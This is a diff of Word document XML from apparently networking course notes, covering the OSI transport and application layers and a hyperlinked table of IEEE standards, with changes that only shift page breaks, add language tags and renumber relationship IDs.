+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Transport Layer reads the port number from its header and forwards the Data which it has received to the respective application. It also performs sequencing and reassembling of the segmented data.</w:t>
       </w:r>
     </w:p>
@@ -1413,7 +1921,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>The functions of the transport layer are :</w:t>
       </w:r>
     </w:p>
@@ -1858,6 +2365,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>**All the above 3 layers are integrated as a single layer in TCP/IP model as “Application Layer”.</w:t>
       </w:r>
       <w:r>
@@ -1869,16 +2377,6 @@
           <w:szCs w:val="24"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">**Implementation of above 3 layers is done by the network application itself. These are also known as </w:t>
       </w:r>
       <w:r>
@@ -1967,6 +2465,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -1986,7 +2485,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10">
+                    <a:blip r:embed="rId12">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2286,6 +2785,7 @@
           <w:noProof/>
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
@@ -2305,7 +2805,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11" cstate="print">
+                    <a:blip r:embed="rId13" cstate="print">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -2374,6 +2874,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Network Virtual Terminal </w:t>
       </w:r>
     </w:p>
@@ -2396,7 +2897,6 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>FTAM-File transfer access and management</w:t>
       </w:r>
     </w:p>
@@ -2551,6 +3051,7 @@
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="en-US" w:eastAsia="en-US"/>
         </w:rPr>
         <mc:AlternateContent>
           <mc:Choice Requires="wps">
@@ -2680,7 +3181,6 @@
         </w:pBdr>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
         <w:t>The IEEE standards</w:t>
       </w:r>
     </w:p>
@@ -2733,7 +3233,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId12" w:tooltip="IEEE 260 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId14" w:tooltip="IEEE 260 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2793,7 +3293,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId13" w:tooltip="IEEE 488" w:history="1">
+            <w:hyperlink r:id="rId15" w:tooltip="IEEE 488" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2853,7 +3353,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId14" w:tooltip="IEEE 610 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId16" w:tooltip="IEEE 610 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2913,7 +3413,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId15" w:tooltip="IEEE 754" w:history="1">
+            <w:hyperlink r:id="rId17" w:tooltip="IEEE 754" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2942,7 +3442,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId16" w:tooltip="Floating point" w:history="1">
+            <w:hyperlink r:id="rId18" w:tooltip="Floating point" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2985,7 +3485,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId17" w:tooltip="IEEE 802" w:history="1">
+            <w:hyperlink r:id="rId19" w:tooltip="IEEE 802" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3014,7 +3514,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId18" w:tooltip="LAN" w:history="1">
+            <w:hyperlink r:id="rId20" w:tooltip="LAN" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3034,7 +3534,7 @@
               </w:rPr>
               <w:t>/</w:t>
             </w:r>
-            <w:hyperlink r:id="rId19" w:tooltip="Metropolitan area network" w:history="1">
+            <w:hyperlink r:id="rId21" w:tooltip="Metropolitan area network" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3069,7 +3569,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId20" w:tooltip="IEEE 802.1" w:history="1">
+            <w:hyperlink r:id="rId22" w:tooltip="IEEE 802.1" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3129,7 +3629,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId21" w:tooltip="IEEE 802.2" w:history="1">
+            <w:hyperlink r:id="rId23" w:tooltip="IEEE 802.2" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3189,7 +3689,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId22" w:tooltip="IEEE 802.3" w:history="1">
+            <w:hyperlink r:id="rId24" w:tooltip="IEEE 802.3" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3218,7 +3718,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId23" w:tooltip="Ethernet" w:history="1">
+            <w:hyperlink r:id="rId25" w:tooltip="Ethernet" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3261,7 +3761,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId24" w:tooltip="IEEE 802.4" w:history="1">
+            <w:hyperlink r:id="rId26" w:tooltip="IEEE 802.4" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3321,7 +3821,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId25" w:tooltip="IEEE 802.5" w:history="1">
+            <w:hyperlink r:id="rId27" w:tooltip="IEEE 802.5" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3381,7 +3881,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId26" w:tooltip="IEEE 802.6" w:history="1">
+            <w:hyperlink r:id="rId28" w:tooltip="IEEE 802.6" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3441,7 +3941,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId27" w:tooltip="IEEE 802.7" w:history="1">
+            <w:hyperlink r:id="rId29" w:tooltip="IEEE 802.7" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3501,7 +4001,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId28" w:tooltip="IEEE 802.8" w:history="1">
+            <w:hyperlink r:id="rId30" w:tooltip="IEEE 802.8" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3561,7 +4061,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId29" w:tooltip="IEEE 802.9" w:history="1">
+            <w:hyperlink r:id="rId31" w:tooltip="IEEE 802.9" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3621,7 +4121,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId30" w:tooltip="IEEE 802.10" w:history="1">
+            <w:hyperlink r:id="rId32" w:tooltip="IEEE 802.10" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3681,7 +4181,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId31" w:tooltip="IEEE 802.11" w:history="1">
+            <w:hyperlink r:id="rId33" w:tooltip="IEEE 802.11" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3718,7 +4218,7 @@
               </w:rPr>
               <w:t>Wireless Networking – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId32" w:tooltip="WiFi" w:history="1">
+            <w:hyperlink r:id="rId34" w:tooltip="WiFi" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3761,7 +4261,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId33" w:tooltip="IEEE 802.12" w:history="1">
+            <w:hyperlink r:id="rId35" w:tooltip="IEEE 802.12" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3821,7 +4321,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId34" w:tooltip="IEEE 802.14" w:history="1">
+            <w:hyperlink r:id="rId36" w:tooltip="IEEE 802.14" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3881,7 +4381,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId35" w:tooltip="IEEE 802.15.2" w:history="1">
+            <w:hyperlink r:id="rId37" w:tooltip="IEEE 802.15.2" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3941,7 +4441,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId36" w:tooltip="IEEE 802.15.4" w:history="1">
+            <w:hyperlink r:id="rId38" w:tooltip="IEEE 802.15.4" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3978,7 +4478,7 @@
               </w:rPr>
               <w:t>Wireless Sensor/Control Networks – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId37" w:tooltip="ZigBee" w:history="1">
+            <w:hyperlink r:id="rId39" w:tooltip="ZigBee" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4021,7 +4521,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId38" w:tooltip="IEEE 802.15.6" w:history="1">
+            <w:hyperlink r:id="rId40" w:tooltip="IEEE 802.15.6" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4058,7 +4558,7 @@
               </w:rPr>
               <w:t xml:space="preserve">Wireless </w:t>
             </w:r>
-            <w:hyperlink r:id="rId39" w:tooltip="Body Area Network" w:history="1">
+            <w:hyperlink r:id="rId41" w:tooltip="Body Area Network" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4070,7 +4570,7 @@
                 <w:t>Body Area Network</w:t>
               </w:r>
             </w:hyperlink>
-            <w:hyperlink r:id="rId40" w:anchor="cite_note-15" w:history="1">
+            <w:hyperlink r:id="rId42" w:anchor="cite_note-15" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4091,7 +4591,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> (BAN) – (e.g. </w:t>
             </w:r>
-            <w:hyperlink r:id="rId41" w:tooltip="Bluetooth low energy" w:history="1">
+            <w:hyperlink r:id="rId43" w:tooltip="Bluetooth low energy" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4134,7 +4634,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId42" w:tooltip="IEEE 802.16" w:history="1">
+            <w:hyperlink r:id="rId44" w:tooltip="IEEE 802.16" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4171,7 +4671,7 @@
               </w:rPr>
               <w:t>Wireless Networking – "</w:t>
             </w:r>
-            <w:hyperlink r:id="rId43" w:tooltip="WiMAX" w:history="1">
+            <w:hyperlink r:id="rId45" w:tooltip="WiMAX" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4214,7 +4714,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId44" w:tooltip="IEEE 802.24 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId46" w:tooltip="IEEE 802.24 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4274,7 +4774,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId45" w:tooltip="IEEE 828 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId47" w:tooltip="IEEE 828 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4334,7 +4834,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId46" w:tooltip="IEEE 829" w:history="1">
+            <w:hyperlink r:id="rId48" w:tooltip="IEEE 829" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4394,7 +4894,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId47" w:tooltip="IEEE 830" w:history="1">
+            <w:hyperlink r:id="rId49" w:tooltip="IEEE 830" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4454,7 +4954,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId48" w:tooltip="IEEE 896" w:history="1">
+            <w:hyperlink r:id="rId50" w:tooltip="IEEE 896" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4514,7 +5014,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId49" w:tooltip="IEEE 1003" w:history="1">
+            <w:hyperlink r:id="rId51" w:tooltip="IEEE 1003" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4543,7 +5043,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId50" w:tooltip="Unix" w:history="1">
+            <w:hyperlink r:id="rId52" w:tooltip="Unix" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4586,7 +5086,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId51" w:tooltip="IEEE 1016" w:history="1">
+            <w:hyperlink r:id="rId53" w:tooltip="IEEE 1016" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4646,7 +5146,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId52" w:tooltip="IEEE 1028 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId54" w:tooltip="IEEE 1028 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4706,7 +5206,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId53" w:tooltip="IEEE 1044.1 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId55" w:tooltip="IEEE 1044.1 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4766,7 +5266,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId54" w:tooltip="IEEE 1059 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId56" w:tooltip="IEEE 1059 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4826,7 +5326,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId55" w:tooltip="IEEE 1073" w:history="1">
+            <w:hyperlink r:id="rId57" w:tooltip="IEEE 1073" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4886,7 +5386,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId56" w:tooltip="IEEE 1074 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId58" w:tooltip="IEEE 1074 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4946,7 +5446,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId57" w:tooltip="IEEE 1076" w:history="1">
+            <w:hyperlink r:id="rId59" w:tooltip="IEEE 1076" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4975,7 +5475,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId58" w:tooltip="VHDL" w:history="1">
+            <w:hyperlink r:id="rId60" w:tooltip="VHDL" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4995,7 +5495,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> – </w:t>
             </w:r>
-            <w:hyperlink r:id="rId59" w:tooltip="VHSIC" w:history="1">
+            <w:hyperlink r:id="rId61" w:tooltip="VHSIC" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5015,7 +5515,7 @@
               </w:rPr>
               <w:t xml:space="preserve"> </w:t>
             </w:r>
-            <w:hyperlink r:id="rId60" w:tooltip="Hardware Description Language" w:history="1">
+            <w:hyperlink r:id="rId62" w:tooltip="Hardware Description Language" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5050,7 +5550,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId61" w:tooltip="JTAG" w:history="1">
+            <w:hyperlink r:id="rId63" w:tooltip="JTAG" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5110,7 +5610,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId62" w:tooltip="JTAG" w:history="1">
+            <w:hyperlink r:id="rId64" w:tooltip="JTAG" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5139,7 +5639,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId63" w:tooltip="AC-JTAG (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId65" w:tooltip="AC-JTAG (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5174,7 +5674,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId64" w:tooltip="IEEE 1180 (page does not exist)" w:history="1">
+            <w:hyperlink r:id="rId66" w:tooltip="IEEE 1180 (page does not exist)" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5203,7 +5703,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId65" w:tooltip="Discrete cosine transform" w:history="1">
+            <w:hyperlink r:id="rId67" w:tooltip="Discrete cosine transform" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5246,7 +5746,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId66" w:tooltip="IEEE 1233" w:history="1">
+            <w:hyperlink r:id="rId68" w:tooltip="IEEE 1233" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5306,7 +5806,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId67" w:tooltip="IEEE 1275" w:history="1">
+            <w:hyperlink r:id="rId69" w:tooltip="IEEE 1275" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5366,7 +5866,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId68" w:tooltip="IEEE 1284" w:history="1">
+            <w:hyperlink r:id="rId70" w:tooltip="IEEE 1284" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5395,7 +5895,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId69" w:tooltip="Parallel port" w:history="1">
+            <w:hyperlink r:id="rId71" w:tooltip="Parallel port" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5430,7 +5930,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId70" w:tooltip="IEEE P1363" w:history="1">
+            <w:hyperlink r:id="rId72" w:tooltip="IEEE P1363" w:history="1">
               <w:r>
                 <w:rPr>
                   <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5459,7 +5959,7 @@
                 <w:szCs w:val="24"/>
               </w:rPr>
             </w:pPr>
-            <w:hyperlink r:id="rId71" w:tooltip="Public key cryptography" w:history="1">
+            <w:hyperlink r:id="rId73" w:tooltip="Public key cryptography" w:history="1">
               <w:r>
                 <w:rPr>
